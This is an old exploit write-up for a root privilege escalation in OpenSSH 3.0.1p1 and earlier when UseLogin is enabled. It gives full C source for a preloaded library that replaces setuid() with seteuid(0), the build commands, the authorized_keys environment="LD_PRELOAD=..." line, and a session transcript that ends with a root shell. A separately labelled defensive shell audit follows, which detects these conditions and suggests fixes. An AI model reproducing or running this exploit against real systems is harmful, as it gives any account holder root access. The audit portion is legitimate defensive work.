OpenSSH v3.0.1p1 and below root exploit which only works if the administrator has turned on the UseLogin feature. Uses the libroot library. Requires an account on the remote machine.
b785235fe2fbf2c69f44d93ca622e244033585cf6ba64fbd80330fe466a5f2fc
--[ OpenSSH UseLogin bug proof of concept exploit ]--
by [WaR] <war@genhex.org> / http://www.genhex.org
--[ Intro ]--
I was very curious about how to exploit this problem. Although
I don't think anyone uses this feature, I looked into the matter anyway.
Here it goes. It was tested on the following platforms:
- Slackware 7.1 with OpenSSH3.0p1
- RedHat 7.1 with OpenSSH_2.9p2
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
The exploit should work as long as UseLogin does. YMMV.
This is based on libroot from squidge@onyx.infonexus.com,
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
you thought it wouldn't happen again...).
Kudos to pmsac@toxyn.org for his help figuring out the problem with
the Slackware UseLogin, testing on OpenBSD, and giving the idea for
the seteuid(0) (originally it was a system("/bin/sh");).
--[ Code ]--
Create a lib.c file with the following content:
---8<---
#include <stdio.h>
#include <unistd.h>

/* Replacement for libc's setuid(), picked up through LD_PRELOAD.
 * Instead of dropping privileges it sets the effective uid back to 0. */
int setuid(uid_t uid)
{
    printf("setuid() called...\n");
    seteuid(0);
    return 0;
}
---8<---
Compile it into a library:
gcc -c -o lib.o lib.c
ld -shared -o libroot.so lib.o
chmod 755 ./libroot.so
Now, for the tricky (*g*) part...
You must have an account on the machine, and create an entry
in $HOME/.ssh/authorized_keys (or authorized_keys2) of the form:
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
When sshd accepts your connection, it exports this variable
into the environment *BEFORE* running login. Somewhere after that,
login calls setuid(). Because the library is preloaded, that call
lands in the replacement above, which does a seteuid(0) instead.
$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)
It also works remotely. Anyway, you _MUST_ have an account on
the victim machine so you can set up the environment and log in.
And obviously (duh) it must have UseLogin enabled.
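As a defender-side addition (example code written for this page, not part of the original post, of libroot, or of OpenSSH), the following POSIX shell audit checks the two conditions the attack above relies on: "UseLogin yes" in sshd_config and an environment= option in a user's authorized_keys. It also reports PermitUserEnvironment, the directive later OpenSSH releases use to decide whether such key options are honoured at all (it defaults to no). The config and key file contents are constructed samples written to a temporary directory; the sample key material is a placeholder, and the LD_PRELOAD path is the one from the write-up above.

```shell
#!/bin/sh
# Added example for this page (not from the original post, libroot or OpenSSH):
# audit an sshd_config plus an authorized_keys file for the UseLogin / LD_PRELOAD
# conditions described above. All file contents below are constructed samples;
# on a real host point the functions at /etc/ssh/sshd_config and
# ~user/.ssh/authorized_keys instead.

# 0 when the config enables UseLogin (uncommented, case-insensitive).
uselogin_enabled() {
    grep -Eiq '^[[:space:]]*UseLogin[[:space:]]+yes' "$1"
}

# 0 when the config explicitly permits client-supplied environment options.
user_env_permitted() {
    grep -Eiq '^[[:space:]]*PermitUserEnvironment[[:space:]]+yes' "$1"
}

# Prints every environment="..." option in an authorized_keys file; 0 if any.
env_options_in_keys() {
    grep -Eio 'environment="[^"]*"' "$1"
}

# Verdict for one sshd_config and one authorized_keys file:
#   EXPOSED  - UseLogin on and a user-controlled environment= option present
#   USELOGIN - UseLogin on; no environment= option seen yet, still fix it
#   ENVONLY  - environment= option present, UseLogin off
#   CLEAN    - neither condition found
audit() {
    cfg=$1 keys=$2 login=0 envopt=0
    if uselogin_enabled "$cfg"; then login=1; fi
    if [ -f "$keys" ] && env_options_in_keys "$keys" >/dev/null; then envopt=1; fi
    case "$login$envopt" in
        11) echo EXPOSED ;;
        10) echo USELOGIN ;;
        01) echo ENVONLY ;;
        *)  echo CLEAN ;;
    esac
}

# Human-readable report with the remediation for each finding.
report() {
    v=$(audit "$1" "$2")
    echo "$1 + $2: $v"
    case "$v" in
        EXPOSED|USELOGIN)
            echo "  fix: set 'UseLogin no' in $1 and restart sshd" ;;
    esac
    if [ "$v" = EXPOSED ] || [ "$v" = ENVONLY ]; then
        env_options_in_keys "$2" | sed 's/^/  offending option: /'
        echo "  fix: remove the option, and keep PermitUserEnvironment off"
    fi
    if user_env_permitted "$1"; then
        echo "  note: PermitUserEnvironment yes lets keys inject environment"
    fi
}

# Constructed samples so the example runs stand-alone (removed on exit).
TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT
cat > "$TMP/sshd_config.vuln" <<'EOF'
# constructed: the configuration this advisory depends on
Port 22
UseLogin yes
EOF
cat > "$TMP/sshd_config.safe" <<'EOF'
# constructed: UseLogin left at its default (commented out)
Port 22
#UseLogin no
EOF
cat > "$TMP/authorized_keys.env" <<'EOF'
environment="LD_PRELOAD=/home/war/libroot.so" ssh-dss AAAAEXAMPLEKEY war@localhost
EOF
cat > "$TMP/authorized_keys.plain" <<'EOF'
ssh-dss AAAAEXAMPLEKEY war@localhost
EOF

report "$TMP/sshd_config.vuln" "$TMP/authorized_keys.env"
report "$TMP/sshd_config.safe" "$TMP/authorized_keys.plain"
```

The grep patterns only match uncommented directives at the start of a line, so a commented "#UseLogin no" (the shipped default) is treated as off. Run the report over every user's authorized_keys on a host, not just one, since any account holder can add the option to their own file.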
That's all.
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.
-- [WaR]
"If you can't hack it, hit it with a hammer"